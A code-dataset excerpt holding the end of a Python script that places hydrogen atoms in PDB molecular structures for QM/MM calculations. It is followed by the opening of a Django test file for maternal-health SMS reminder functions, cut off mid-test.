l_h_bonds=find_h_bond(atom_qm,pdb,l_vdw)\n# for i in range(len(l_h_bonds)):\n# print(\"l_h_bonds\",l_h_bonds[i])\n if len(l_h_bonds)>=1:\n# print(\"######################adH1#######################\")\n adH1=find_short_H(atom_qm,l_h_bonds)\n if adH1[0]==0:\n return pdb\n name1 =\"H1\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH1, name1)\n if len(l_h_bonds)>=2: \n# print(\"______________________________adH2_______________________\")\n adH2=find_short_H(atom_qm,l_h_bonds)\n if adH2[0]==0:\n return pdb\n name2 =\"H2\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH2, name2)\n\n return pdb\n\n\ndef find_short_H(atom_qm,l_h_bonds):\n## finds shortest istace in list of coordinates\n P1=[atom_qm[8],atom_qm[9],atom_qm[10]]\n d_min=1000000\n for i in range(len(l_h_bonds)):\n P2=[l_h_bonds[i][8],l_h_bonds[i][9],l_h_bonds[i][10]]\n dist=CDist2(P1,P2)\n if dist< d_min:\n exist=f_ex_h(pdb, P1, P2)\n# print(\"exist\",exist)\n# if exist == True:\n# print(\"l_h_bonds[i]\",l_h_bonds[i])\n if exist == False:\n d_min=dist\n atom_min=l_h_bonds[i]\n\n P_s=[atom_min[8],atom_min[9],atom_min[10]]\n vec=twoP_to_vec(P1,P_s)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n h_vec=resize_vec(vec,0.98)\n# print(\"len3Dvec(h_vec)\",len3dvec(h_vec))\n \n coord=[P1[0]+h_vec[0],P1[1]+h_vec[1],P1[2]+h_vec[2]]\n if coord == P1:\n coord= [0]\n return coord\n\ndef f_ex_h(pdb, A1, A2):\n#check if hydrogen is positiond in 30 deree to OHO distance\n## false if proton not existing true if existing\n flag=False\n dh=1.5\n max_dist=0.6\n for j in range(len(pdb)):\n for k in range(len(pdb[j])): \n if pdb[j][k][14]==\"H\" or pdb[j][k][14]==\"D\" :\n p0=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n d1= CDist2(A1,p0)\n d2=CDist2(A2,p0)\n ang=CAngle(A1,p0,A2)\n if d1 <= dh or d2 <=dh:\n if 120 <= ang <= 220:\n# print(\"ATOM H\",pdb[j][k])\n# print(\"ang\",ang)\n flag=True\n\n\n return flag\n\n\ndef d_p_to_line(p0,p1,p2):\n## calculate distance between a point0 and a line between p1 and p2\n if (p1[0] == p2[0] and p1[1] == p2[1] and p1[2] == p2[2]):\n d=0\n else:\n if (p2[0]-p1[0] != 0):\n t=-((p1[0]-p0[0])*(p2[0]-p1[0]))/((abs(p2[0]-p1[0]))**2)\n elif (p2[1]-p1[2] != 0 ):\n t=-((p1[1]-p0[1])*(p2[1]-p1[1]))/((abs(p2[1]-p1[1]))**2)\n elif ( p2[2]-p1[2] != 0):\n t=-((p1[2]-p0[2])*(p2[2]-p1[2]))/((abs(p2[2]-p1[2]))**2)\n\n d2=((p1[0]-p0[0])+(p2[0]-p1[0])*t)**2+((p1[1]-p0[1])+(p2[1]-p1[1])*t)**2+((p1[2]-p0[2])+(p2[2]-p1[2])*t)**2\n d=d2**(0.5)\n return d\n\n\n\n\ndef resize_vec(vec,r):\n vec=Normlz(vec)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n\n new_vec=[vec[0]*r,vec[1]*r,vec[2]*r]\n\n return new_vec\n\ndef find_h_bond(atom_qm,pdb,l_vdw):\n OO=l_vdw[3][1]+l_vdw[3][1]\n ON=l_vdw[3][1]+l_vdw[4][1]\n\n h_bond=[]\n O=[atom_qm[8],atom_qm[9],atom_qm[10]]\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n if pdb[j][k][14]==\"O\" or pdb[j][k][14]==\"N\" :\n# print(pdb[k][6],l_water[i][j][6])\n if pdb[j][k][6]!=atom_qm[6]:\n acc=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n dist=CDist2(O,acc)\n if pdb[j][k][14]==\"O\":\n if dist <= OO:\n h_bond.append(pdb[j][k])\n if pdb[j][k][14]==\"N\":\n if dist <= ON:\n h_bond.append(pdb[j][k])\n\n return h_bond\n\n\ndef vdw():\n l_vdw=[[\"H\",1.20],[\"D\",1.20],[\"C\",1.70],[\"O\",1.52],[\"N\",1.55],[\"CL\",1.75],[\"F\",1.47],[\"BR\",1.85]]\n# h_vdw=1.20\n# c_vdw=1.70\n# o_vdw=1.52\n# n_vdw=1.55\n# s_vdw=1.80\n# cl_vdw= 1.75\n# f_vdw=1.47\n# br_vdw= 1.85\n return l_vdw\n\n\ndef ad_OH(pdb, A2, A3):\n# ad H as OH group to A3\n r = 0.978\n Ad = 106\n Dd = 180\n A1=find_A1(pdb,A3,A2)\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n name1 =\"H\"+A3[2]\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\n\n\ndef prot_c(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n\n# print(bond_atom)\n# print(\"xyz###\",xyz)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n res_num=atom_qm[6]\n alter=atom_qm[3]\n if n_bonds >= 4:\n return pdb\n if n_bonds==1:\n pdb = ad_CH3(pdb,res_num,alter,bond_atom[0],atom_qm)\n \n if n_bonds<=2.5 and len(bond_atom)==2:\n pdb = ad_CH2(pdb, res_num, alter, bond_atom[0], bond_atom[1], atom_qm) \n if 2.5< n_bonds<= 3.5 and len(bond_atom)==2:\n pdb = ad_CH_ar(pdb, bond_atom[0], bond_atom[1], atom_qm)\n if 2.5< n_bonds<= 3.5 and len(bond_atom)==3:\n pdb = ad_CH_R3(pdb, bond_atom[0], bond_atom[1], atom_qm, bond_atom[2])\n\n# print(\"n_bonds\",ele,n_bonds)\n \n return pdb\n\ndef ad_CH_R3(pdb, A1, A2, A3, A4):\n r = 1.032\n Ad = 109\n Dd = 116\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n A4xyz = [A4[8],A4[9],A4[10]]\n\n adH1 = H_tert(A1xyz, A2xyz, A3xyz, A4xyz,r)\n name1 =\"H\"+A3[2]\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\ndef H_tert(A1, A2, A3, A4,r):\n## set terzier H to A3 in dinstace r\n v1=twoP_to_vec(A3,A1)\n v2=twoP_to_vec(A3,A2)\n v3=twoP_to_vec(A3,A4)\n v_sum=[0,0,0]\n for i in range(len(v_sum)):\n v_sum[i]=-(v1[i]+v2[i]+v3[i])\n\n len_v_sum=len3dvec(v_sum)\n H_vec=[0,0,0]\n for i in range(len(v_sum)):\n H_vec[i]=(r*v_sum[i])/len_v_sum\n H_pos=[0,0,0]\n for i in range(len(H_vec)):\n H_pos[i]=A3[i]+H_vec[i]\n return H_pos\n\n\n\n\ndef ad_CH_ar(pdb, A1, A2, A3):\n# ad H as CH (SP2) group to A3\n r = 1.014\n Ad = 120\n Dd = 180\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n name1 =\"H\"+A3[2]\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\n\n\n\n\n\n\n\n\ndef ad_CH2(pdb, res_num, alter, A1, A2, A3):\n# ad 2H as CH2 group to A3\n\n r = 1.095\n Ad = 109\n Dd= -121.5\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"1H\"+name\n name2 = \"2H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n return pdb\n\ndef ad_CH3(pdb, res_num,alter, A2, A3):\n# ad 3H as CH3 group to A3\n# for alt in range(len(alter)):\n# print(\"alter[alt]\",alter[alt])\n# com = check(pdb,res_num,alter[alt],A1, A2, A3, 1)\n# print(com)\n# if com == False:\n# return pdb\n# print( pdb[res_num])\n# print(\"A2\", A2)\n A1=find_A1(pdb,A3,A2)\n# print(\"A1\",A1)\n r = 1.095\n Ad = 109\n Dd = 180\n Dd1 = 60\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n adH3 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd1)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[0]+nam[1]\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n name3 = \"H3\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n pdb = add_to_pdb(pdb, A3, adH3, name3)\n return pdb\n\ndef add_to_pdb(pdb,old_atm,new_koord,new_nam):\n## ad a new deuterium atom to behind an existing atom in the pdb list\n atom=0\n new_nam=\"H\"\n for i in range(len(pdb)):\n for k in range(len(pdb[i])): \n# print(\"ALT\",alt)\n# atom=0\n# print(pdb[res_num][i][3])\n# print(pdb[res_num][i][2].strip())\n if pdb[i][k][2].strip()==old_atm[2].strip() and\\\n pdb[i][k][3].strip()==old_atm[3].strip() and\\\n pdb[i][k][5].strip()==old_atm[5].strip() and\\\n pdb[i][k][6]==old_atm[6]:\n atom=pdb[i][k]\n indice = k+1\n res_num=i\n\n if atom == 0:\n return pdb\n l_pdb=[]\n l_pdb.append(atom[0])\n l_pdb.append(atom[1])\n l_pdb.append(new_nam)\n l_pdb.append(atom[3])\n l_pdb.append(atom[4])\n l_pdb.append(atom[5])\n l_pdb.append(atom[6])\n l_pdb.append(atom[7])\n l_pdb.append(new_koord[0])\n l_pdb.append(new_koord[1])\n l_pdb.append(new_koord[2])\n l_pdb.append(atom[11])\n l_pdb.append(atom[12])\n l_pdb.append(atom[13])\n l_pdb.append(\"H\")\n l_pdb.append(\" \")\n# print(\"old_atom\",old_atm)\n# print(\"atom\",atom)\n# print(\"l_pdb\",l_pdb)\n# print(\"???????????????????????????????????????????\")\n pdb[res_num].insert(indice, l_pdb)\n# pdb[res_num].append(l_pdb)\n return pdb\n\n\n\ndef find_A1(pdb,A3,A2):\n# find atom bond to A2 to define dihedral to A3\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n bond_atoms=f_bond_atoms(pdb,A2)\n# print(bond_atoms)\n for i in range(len(bond_atoms)):\n if bond_atoms[i][2]!= A3[2]:\n A1=bond_atoms[i]\n\n\n return A1\n\ndef CAngle(x,y,z):\n# calculate angle between a,b,c in degree\n x1=[0,0,0]\n x2=[0,0,0]\n for i in range(len(x)):\n x1[i]=y[i]-x[i]\n x2[i]=y[i]-z[i]\n Cangle=C2Angle(x1,x2)\n return Cangle\ndef C2Angle(x,y):\n#Calculates the angle between x and y\n#Answer in degrees\n #Calculate the angle between x and y\n rtodeg = 57.2957795\n C2angle=(ScalPr(x,y)/(len3dvec(x)*len3dvec(y)))\n# print(\"C2angle=\",C2angle)\n if 0.999999999 <= C2angle <= 1.000000000001 :\n C2angle=0\n elif -0.999999999 >= C2angle >= -1.000000000001:\n C2angle=180\n else:\n C2angle=np.arccos(C2angle)*rtodeg\n return C2angle\ndef ScalPr(x,y):\n#calculate the scalar product\n pro= x[0]*y[0]+x[1]*y[1]+x[2]*y[2]\n return pro\n\n\ndef Cross(x1,x2):\n#Calculates the cross product x3 = x1 x x2\n x3 = [0,0,0]\n x3[0]=x1[1]*x2[2]-x2[1]*x1[2]\n x3[1]=x1[2]*x2[0]-x2[2]*x1[0]\n x3[2]=x1[0]*x2[1]-x2[0]*x1[1]\n return x3\n\ndef Normlz(xyz):\n# Normalise xyz \n temp = 1/len3dvec(xyz)\n for i in range(len(xyz)):\n xyz[i]=xyz[i]*temp\n\n return xyz\ndef ZeroVector():\n## creates ZeroVector\n zerov = np.array([0,0,0])\n return zerov\n\ndef CDihed(x,y,z,w):\n#Calculate the dihedral angle x-y-z-w\n#Answer in degrees between -180 and +180\n #Set v1=y-x, v2=z-y, v3=w-z\n v1=[0,0,0]\n v2=[0,0,0]\n v3=[0,0,0]\n for i in range(3):\n v1[i]=y[i]-x[i]\n v2[i]=z[i]-y[i]\n v3[i]=w[i]-z[i]\n\n #Calculate the normal vectors n1 and n2\n n1=Cross(v1,v2)\n n2=Cross(v2,v3)\n\n #Calculate the torsion angle;\n #The sign is determined by the sign of v1.n2\n CDihed=C2Angle(n1,n2)\n if ScalPr(v1,n2) < 0:\n CDihed=-CDihed\n return CDihed\n\n\ndef ZtoXYZ(axyz,bxyz,cxyz,R,Ad,Dd):\n#defines coordinates of 4th atom fro coordinates of 3 atoms distance\n#angel and dihedral \n dxyz = [0,0,0]\n rtodeg = 57.2957795\n\n ## first check if atoms are linear (of yes something is wrong)\n tangle=CAngle(axyz,bxyz,cxyz)\n if abs(tangle)<= 0.1 or 179.9<= abs(tangle) <= 180.0:\n print(\"The atoms are collinear\", tangle)\n sys.exit()\n\n # transforme vrom degree to rad\n A = Ad/rtodeg\n D = Dd/rtodeg\n\n ## Calculate the coordinates in a simple coordinate system\n dxyz[0] = (-R)* np.sin(A)*np.sin(D)\n dxyz[1] = R * np.cos(A)\n dxyz[2] = R * np.sin(A)*np.cos(D)\n b = np.sqrt(CDist2(bxyz,cxyz))\n ab1 = np.sqrt(CDist2(axyz,bxyz))\n ang = CAngle(axyz,bxyz,cxyz)/rtodeg\n a2 = b - np.cos(ang)*ab1\n a3 = np.sin(ang)*ab1\n a1 = 0.0000\n\n ## Now, atom D is transformed into the original coordinate system\n ## 1st rotation\n tv = np.array([0.00, b, 0.00])\n bcv = np.array([bxyz[0]-cxyz[0], bxyz[1]-cxyz[1],bxyz[2]-cxyz[2]])\n rv = Cross(tv, bcv)\n rv = Normlz(rv)\n rv = np.array([rv[0],rv[1],rv[2]])\n zerov = ZeroVector()\n phi = CAngle(tv,zerov,bcv)/rtodeg\n an = [0,0,0]\n an[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*a1+\\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*a2+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*a3\n\n an[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*a1+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*a2+\\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*a3\n\n an[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*a1+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*a2+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*a3\n\n dn = [0,0,0]\n dn[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*dxyz[0]+ \\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*dxyz[1]+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*dxyz[2]\n\n dn[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*dxyz[1]+ \\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*dxyz[2]\n\n dn[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*dxyz[1]+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n\n # 2nd rotation\n tv[0]=axyz[0]-cxyz[0]\n tv[1]=axyz[1]-cxyz[1]\n tv[2]=axyz[2]-cxyz[2]\n phi=CDihed(tv,bcv,zerov,an)/rtodeg\n bcv = Normlz(bcv)\n\n dn[0]=(bcv[0]*bcv[0]+(1-bcv[0])*(1+bcv[0])*np.cos(phi))*dxyz[0]+\\\n (bcv[0]*bcv[1]*(1-np.cos(phi))-bcv[2]*np.sin(phi)) *dxyz[1]+\\\n (bcv[0]*bcv[2]*(1-np.cos(phi))+bcv[1]*np.sin(phi)) *dxyz[2]\n\n dn[1]=(bcv[0]*bcv[1]*(1-np.cos(phi))+bcv[2]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[1]+(1-bcv[1])*(1+bcv[1])*np.cos(phi))*dxyz[1]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))-bcv[0]*np.sin(phi)) *dxyz[2]\n\n dn[2]=(bcv[0]*bcv[2]*(1-np.cos(phi))-bcv[1]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))+bcv[0]*np.sin(phi)) *dxyz[1]+\\\n (bcv[2]*bcv[2]+(1-bcv[2])*(1+bcv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n #Final translation\n dxyz[0]=dxyz[0]+cxyz[0]\n dxyz[1]=dxyz[1]+cxyz[1]\n dxyz[2]=dxyz[2]+cxyz[2]\n\n\n return dxyz\n\n\n\n\n\n\ndef f_bond_atoms(pdb,atom_qm):\n## find bondet atoms\n bond_atom=[]\n xyz=[atom_qm[8],atom_qm[9],atom_qm[10]]\n bond_atom=[]\n# print(\"xyz&&&\",xyz)\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n p2=[pdb[i][k][8],pdb[i][k][9],pdb[i][k][10]]\n dist=CDist2(xyz,p2)\n # print(dist)\n if 0.5< dist< 2:\n# print(dist)\n bond_atom.append(pdb[i][k])\n return bond_atom\n\n\n\ndef def_n_bonds(xyz,ele,bond_atoms):\n# defines how many atoms are bond to the central atom with bond order\n nr_bonds=0\n# print(\"xyz!!!\",xyz)\n for i in range(len(bond_atoms)):\n p2=[bond_atoms[i][8],bond_atoms[i][9],bond_atoms[i][10]]\n dist=CDist2(xyz,p2)\n l_ele=[ele,bond_atoms[i][14]]\n# print(\"dist\",dist)\n if l_ele[0]==\"C\":\n if l_ele[1]==\"C\":\n if 0.5 < dist < 1.25:\n nr_bonds=nr_bonds+3\n if 1.25<= dist <=1.37:\n nr_bonds=nr_bonds+2\n if 1.38<= dist<= 1.47:\n nr_bonds=nr_bonds+1.5\n if 1.48<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"O\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n if 1.33<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"N\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1.5\n if 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"N\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n elif 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"O\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n elif 1.32 < dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.29:\n nr_bonds=nr_bonds+1\n else:\n if 1.55< dist <=2.5:\n nr_bonds=nr_bonds+1\n if 0.5<= dist <= 1.55:\n nr_bonds=nr_bonds+2\n\n return nr_bonds\n\n\n\ndef CDist2(A,B):\n#calculate distance betweenn two points\n dist = len3dvec(twoP_to_vec(A, B))\n return dist\n\n\n\ndef len3dvec(vec):\n## calculates lengh of a 3D vecor\n## input as list\n a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n return a\n\ndef twoP_to_vec(A,B):\n#creates vector between two points\n vec = np.array([B[0]-A[0], B[1]-A[1], B[2]-A[2]])\n\n return vec\n\n\ndef renumber_pdb(pdb):\n#renumbers pdb\n num=0\n for i in range(len(pdb)):\n for j in range(len(pdb[i])):\n num=num+1\n pdb[i][j][1]=num\n\n return pdb\n\n\n\ndef write_pdb(pdb,head, output):\n## wite out PDB file\n# res = open(output, \"w\")\n res= open(\"comqum.pdb\",\"w\")\n atm_nr=0\n for i in range(len(head)):\n res.write(head[i])\n# res.write(\"\\n\")\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n atm_nr = atm_nr + 1\n string = str('{:6}'.format(pdb[i][k][0]))\n string = string + str('{:5.0f}'.format(atm_nr))\n string = string + \" \"\n string = string + str('{:4s}'.format(str(pdb[i][k][2])))\n# string = string + str('{:1}'.format(pdb[i][k][3]))\n string = string + str('{:3}'.format(pdb[i][k][4]))\n string = string + str('{:>2}'.format(pdb[i][k][5]))\n string = string + str('{:4}'.format(pdb[i][k][6]))\n string = string + str('{:1}'.format(pdb[i][k][7]))\n string = string + \" \"\n string = string + str('{:8.3f}'.format(pdb[i][k][8]))\n string = string + str('{:8.3f}'.format(pdb[i][k][9]))\n string = string + str('{:8.3f}'.format(pdb[i][k][10]))\n string = string + str('{:6.2f}'.format(pdb[i][k][11]))\n string = string + str('{:6.2f}'.format(pdb[i][k][12]))\n string = string + str('{:>7}'.format(pdb[i][k][13]))\n string = string + str('{:>5}'.format(pdb[i][k][14]))\n\n\n string = string + \"\\n\"\n res.write(string)\n res.write(\"END\")\n\n\ndef find_cov(ele):\n# define covalent radius for element)\n cov=cov_rad()\n# print(cov)\n# print(\"ele\",ele)\n ex=False\n for i in range(len(cov)):\n if ele==cov[i][0]:\n cov_r=cov[i][1]\n ex=True\n if ex==False:\n print(\"missing covalent radi\", ele)\n return cov_r\n\n\ndef ad_H_no_mm3(mm3,pdb):\n# ad H from pdb to mm3\n nr=0\n nr_ad=0\n nr_ex=0\n for i in range(len(mm3)):\n for j in range(len(mm3[i])):\n# print(\"mm3[i][j][14]\",mm3[i][j][14])\n cov1=find_cov(mm3[i][j][14]) \n# print(\"cov1\",cov1)\n xyz_m=[mm3[i][j][8],mm3[i][j][9],mm3[i][j][10]]\n# xyz_m=[0,0,0]\n for k in range(len(pdb)):\n# print(pdb[k])\n if pdb[k][1]==\"H\":\n cov2=find_cov(pdb[k][1])\n xyz_p=[pdb[k][2],pdb[k][3],pdb[k][4]]\n max_dist=cov1+cov2+0.4\n dist=CDist2(xyz_m,xyz_p)\n# print(dist)\n if dist <= max_dist:\n ext, nr_ex=check_ext(mm3,xyz_p, nr_ex)\n if ext == False:\n trunc,nr=check_trunc(mm3,mm3[i][j],xyz_p,nr)\n# print(\"mm3[i][j]1\",mm3[i][j])\n if trunc==False:\n# print(\"ad H to mm3\")\n mm3 = add_to_pdb(mm3, mm3[i][j], xyz_p, \"H\")\n nr_ad = nr_ad +1\n nr_H=0\n for i in range(len(pdb)):\n if pdb[i][1]==\"H\":\n nr_H=nr_H+1\n print(\"numbre of hydrogen atoms in pdb file:\",nr_H)\n print(\"number of truncation atoms\",(nr/2))\n print(\" number af transvered hydrogen atoms\", nr_ad)\n print(\" missing number of hydrogen atoms\", nr_H-nr_ad-int(nr/2))\n return mm3, nr_ad\n\ndef check_trunc(mm3,b_atom,xyz_p,nr):\n#check if hydrogen atom is a truncation atom\n xyz_b=[b_atom[8],b_atom[9],b_atom[10]]\n cov1=find_cov(b_atom[14])\n bond_atoms=[]\n for i in range(len(mm3)):\n for j in range(len(mm3[i])):\n cov2=find_cov(mm3[i][j][14])\n xyz_m=[mm3[i][j][8],mm3[i][j][9],mm3[i][j][10]] \n dist=CDist2(xyz_m,xyz_b)\n max_dist=cov1+cov2+0.4\n if 0.2 <= dist <= max_dist:\n bond_atoms.append(mm3[i][j])\n \n if len(bond_atoms)>= 1:\n for i in range(len(bond_atoms)):\n xyz_2=[bond_atoms[i][8],bond_atoms[i][9],bond_atoms[i][10]]\n r1=CDist2(xyz_p,xyz_b)\n r2=CDist2(xyz_p,xyz_2)\n cov3=find_cov(bond_atoms[i][14])\n cov2=find_cov(\"H\")\n max_dist1=cov1+cov2+0.4\n max_dist2=cov3+cov2+0.4\n if 0.1 <= r1 <= max_dist1 and 0.1 <= r2 <= max_dist2:\n d=d_p_to_line(xyz_p,xyz_b,xyz_2)\n if d <= 0.1:\n# print(\"b_atom \",b_atom)\n# print(\"bond_atoms[i]\",bond_atoms[i])\n nr = nr+1\n# print(\"test junc atom\")\n return True, nr\n return False, nr\n\ndef d_p_to_line(p0,p1,p2):\n## calculate distance between a point0 and a line between p1 and p2\n if (p1[0] == p2[0] and p1[1] == p2[1] and p1[2] == p2[2]):\n d=0\n else:\n if (p2[0]-p1[0] != 0):\n t=-((p1[0]-p0[0])*(p2[0]-p1[0]))/((abs(p2[0]-p1[0]))**2)\n elif (p2[1]-p1[2] != 0 ):\n t=-((p1[1]-p0[1])*(p2[1]-p1[1]))/((abs(p2[1]-p1[1]))**2)\n elif ( p2[2]-p1[2] != 0):\n t=-((p1[2]-p0[2])*(p2[2]-p1[2]))/((abs(p2[2]-p1[2]))**2)\n\n d2=((p1[0]-p0[0])+(p2[0]-p1[0])*t)**2+((p1[1]-p0[1])+(p2[1]-p1[1])*t)**2+((p1[2]-p0[2])+(p2[2]-p1[2])*t)**2\n d=d2**(0.5)\n return d\n\ndef check_ext(mm3,xyz_p, nr_ex):\n#check if atom is already in structure\n for i in range(len(mm3)):\n for j in range(len(mm3[i])):\n xyz_m=[mm3[i][j][8],mm3[i][j][9],mm3[i][j][10]]\n dist=CDist2(xyz_m,xyz_p)\n if dist<= 0.1:\n nr_ex = nr_ex +1\n# print(\"Atom already existes\")\n return True, nr_ex\n return False, nr_ex\n\ndef cov_rad():\n#list of Covalent radii in from Cambridge Structural Database\n cov_rad=[[\"H\",0.31],[\"D\",0.31],[\"C\",0.76],[\"N\",0.71],[\"O\",0.66],[\"S\",1.05],[\"Fe\",1.52],[\"CL\",1.02]]\n cov_rad.append([\"NA\",1.66])\n cov_rad.append([\"MG\",1.41])\n cov_rad.append([\"FE\",1.52])\n cov_rad.append([\"MO\",1.54])\n cov_rad.append([\"V\",1.53])\n cov_rad.append([\"P\",1.07])\n cov_rad.append([\"SE\",1.20])\n cov_rad.append([\"W\",1.62])\n return cov_rad\n\n\n#######################################################################################\n#processing data\nprint(mm3_input)\nprint(input_pdb)\n\norg_mm3, work_mm3, head = read_pdb(mm3_input)\nwork_pdb = read_pdb_from_mimic(input_pdb)\n\nmm3=atm_to_res(work_mm3)\nnr_ad=1\nl=0\nwhile l<=10:\n print(\"loop\", l)\n mm3, nr_ad = ad_H_no_mm3(mm3,work_pdb)\n l=l+1\n if nr_ad ==0:\n break\nprint(\"loop\",l)\nmm3 =renumber_pdb(mm3)\n\nwrite_pdb(mm3,head,out_file)\n\n\ntime_ende = time.time()\nprint(\"program ends normally after \"'{:5.3f}s'.format(time_ende-time_start),\" or \", '{:5.2f}min'.format((time_ende-time_start)/60))\n\n","sub_path":"restart_comqum_pdb.py","file_name":"restart_comqum_pdb.py","file_ext":"py","file_size_in_byte":36227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"504021260","text":"from datetime import datetime, timedelta\n\nfrom rapidsms.models import Contact\nfrom rapidsms.contrib.messagelog.models import Message\n\nfrom mwana.apps.contactsplus.models import ContactType\n\nfrom mwana.apps.smgl.tests.shared import SMGLSetUp, create_mother\nfrom mwana.apps.smgl import const\nfrom mwana.apps.smgl.reminders import (send_inactive_notice_cbas,\n send_inactive_notice_data_clerks,\n send_expected_deliveries)\n\n\nclass SMGLReminderTest(SMGLSetUp):\n fixtures = [\"initial_data.json\"]\n\n def setUp(self):\n super(SMGLReminderTest, self).setUp()\n self.createDefaults()\n self.now = datetime.utcnow().date()\n self.mom = create_mother(data={'edd': self.now + timedelta(days=5)})\n self.incharge = ContactType.objects.get(slug='incharge')\n self.anton = Contact.objects.get(name='antonOther')\n self.anton.types.add(self.incharge)\n self.anton.location = self.mom.location\n self.anton.save()\n\n def testInactiveContactReminderDataClerks(self):\n # get inbound messages for user\n da = Contact.objects.get(id=5)#5 is a data clerk\n join_msg = Message.objects.get(direction=\"I\", connection__contact=da)\n out_msgs = Message.objects.filter(direction=\"O\", connection__contact=da)\n self.assertEqual(out_msgs.count(), 1)\n # this should do nothing because it's not in range\n 